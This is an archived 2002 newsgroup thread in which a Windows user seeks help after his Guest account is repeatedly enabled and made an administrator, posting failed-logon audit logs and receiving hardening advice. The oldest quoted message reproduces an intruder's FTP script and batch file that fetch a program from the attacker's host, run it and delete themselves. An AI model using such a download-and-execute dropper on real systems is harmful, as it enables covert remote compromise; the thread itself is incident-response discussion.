Re: Is it really true that NTFS is secure?
From: George Hester (hesterloli@hotmail.com)
Date: 12/14/02
- Next message: Mike: "pop ups and advertisements"
- Previous message: George Hester: "Re: Is it really true that NTFS is secure?"
- In reply to: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Next in thread: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Reply: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "George Hester" <hesterloli@hotmail.com> Date: Fri, 13 Dec 2002 20:13:34 -0500
Update.
The account Group got put back in the Administrator group again. I had audits going and here is the time\status in which this occurred:
Event Source: Security
Event Category: Account Logon
Event ID: 681
Date: 12/13/2002
Time: 5:56:46 PM
User: NT AUTHORITY\SYSTEM
Computer: MyMachineName
Description:
The logon to account: Administrator
by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
from workstation: HAMID-MSLR91LJD
failed. The error code was: 3221225578
Event Type: Failure Audit
Event Source: Security
Event Category: Logon/Logoff
Event ID: 529
Date: 12/13/2002
Time: 5:56:46 PM
User: NT AUTHORITY\SYSTEM
Computer: MyMachineName
Description:
Logon Failure:
Reason: Unknown user name or bad password
User Name: Administrator
Domain: HAMID-MSLR91LJD
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: HAMID-MSLR91LJD
Event Type: Failure Audit
Event Source: Security
Event Category: Account Logon
Event ID: 681
Date: 12/13/2002
Time: 5:56:46 PM
User: NT AUTHORITY\SYSTEM
Computer: MyMachineName
Description:
The logon to account: Administrator
by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
from workstation: HAMID-MSLR91LJD
failed. The error code was: 3221225578
Event Type: Failure Audit
Event Source: Security
Event Category: Account Logon
Event ID: 681
Date: 12/13/2002
Time: 7:41:52 PM
User: NT AUTHORITY\SYSTEM
Computer: MyMachineName
Description:
The logon to account: Administrator
by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
from workstation: SAVVYEM
failed. The error code was: 3221225578
Event Type: Failure Audit
Event Source: Security
Event Category: Logon/Logoff
Event ID: 529
Date: 12/13/2002
Time: 7:41:52 PM
User: NT AUTHORITY\SYSTEM
Computer: MyMachineName
Description:
Logon Failure:
Reason: Unknown user name or bad password
User Name: Administrator
Domain: SAVVYEM
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: SAVVYEM
This last tried to sign on with user name root, admin, test, administrator and then finally gave up. But my Guest User account is still changing to enabled and putting itself in the Administrator Group. That action I am not seeing in the Event Viewer anywhere. What can I do to catch that event? I believe I need the Guest group for IIS as IUSER_MachieName is in there. Please be detailed as I looked in Group Policy and cannot seem to find what is necessary so I can see when that event occurs and what\who is responsible. Thanks
-- George Hester __________________________________ "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message news:#c7LZ5soCHA.2384@TK2MSFTNGP11... > You can enable auditing to watch for things like this: > > http://securityadmin.info/faq.htm#auditing > > Checking your IIS web logs is another common place to check. Look for > anything that mentions .EXE or % and that also has a code 200 or 502 in that > line. URLScan is a free IIS tool that comes with IISLockdown from > www.microsoft.com/technet/security that will block all this stuff, if that's > what this is. Most firewalls won't detect or block this stuff. > > Be sure you have a firewall, as this will log all traffic to and from your > server. The firewall should also block NetBIOS traffic on TCP and UDP ports > 135-139 and 445 from the internet, as this is another way people could be > accessing your guest account. > > Intrusion detection such as Black Ice or Snort [free] might be worth a try, > though getting Snort to alert just on interesting events on a Windows server > takes some knowledge. > > The free file change checker from www.gfi.com can also help you monitor your > system for intrusions not caught by antivirus, trojan scanners or firewalls. > > Other things to do to look for the source of the hacking and secure your > servers and computers are listed at: > > http://securityadmin.info/faq.htm#hacked [first] > http://securityadmin.info/faq.htm#harden [second] > > > "George Hester" <hesterloli@hotmail.com> wrote in message > news:ufXDRfmoCHA.2424@TK2MSFTNGP12... > Please understand that my machine comes up empty handed on all AV scans and > trojans. I need to find some way of watching when this Group Policy change > happens. Like a log. That tells me the time that it happend or the > responsible party. It doesn't show in Event Viewer. > > You know I ran a server W2K prior to this and never had this issue. Started > on Prof full time now and I am battling security it seems every hour. > > -- > George Hester > __________________________________ > "George Hester" <hesterloli@hotmail.com> wrote in message > news:OwrkSZmoCHA.2424@TK2MSFTNGP12... > Yes you may be able to help me with something. My Guerst user keeps getting > enabled and put in the Administrator group. How? > > -- > George Hester > __________________________________ > "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message > news:eleuHGkoCHA.1628@TK2MSFTNGP12... > > Do you have a problem we could help you with? Are there more details? > > > > What does this code have to do with NTFS? I'm sorry if your machine was > > exploited, though I'm not sure this has to do with NTFS. > > > > NTFS file permissions are plenty secure against remote exploits. If you > > have other security vulnerabilities that permit running commands as an > > account that has permissions in the NTFS ACLs, that's not exactly an NTFS > > failing. > > > > Windows 2000 configured correctly is as secure as most other operating > > systems configured correctly. Windows 2000 in the default install is > about > > as un-secure as Linux in the default install, especially if you go back to > > Linux from the year 2000. Securing Windows 2000 is about as complex and > > time consuming as securing Linux, maybe even easier. > > > > More information on ways to determine how you were hacked and how to > secure > > your computer: > > > > http://securityadmin.info/faq.htm#hacked > > http://securityadmin.info/faq.htm#re-secure > > http://securityadmin.info/faq.htm#harden > > > > > > "George Hester" <hesterloli@hotmail.com> wrote in message > > news:uB7a4afoCHA.2220@TK2MSFTNGP09... > > '--------- File: s.t sitting in %SystemRoot%\system32 -> > > open #my.ip.address# 'chnaged ip for privacy > > binary > > recv sui.exe .\sui.exe > > quit > > /-------- End of s.t > > > > REM File r.bat sitting in %SystemRoot%\system32 --> > > ftp -vnAs:s.t > > del s.t > > sui.exe -s678p345 -o > > call g.bat > > del r.bat > > REM End of r.bat -------- > > > > > > > > > >
- Next message: Mike: "pop ups and advertisements"
- Previous message: George Hester: "Re: Is it really true that NTFS is secure?"
- In reply to: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Next in thread: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Reply: Karl Levinson [x y] mvp: "Re: Is it really true that NTFS is secure?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
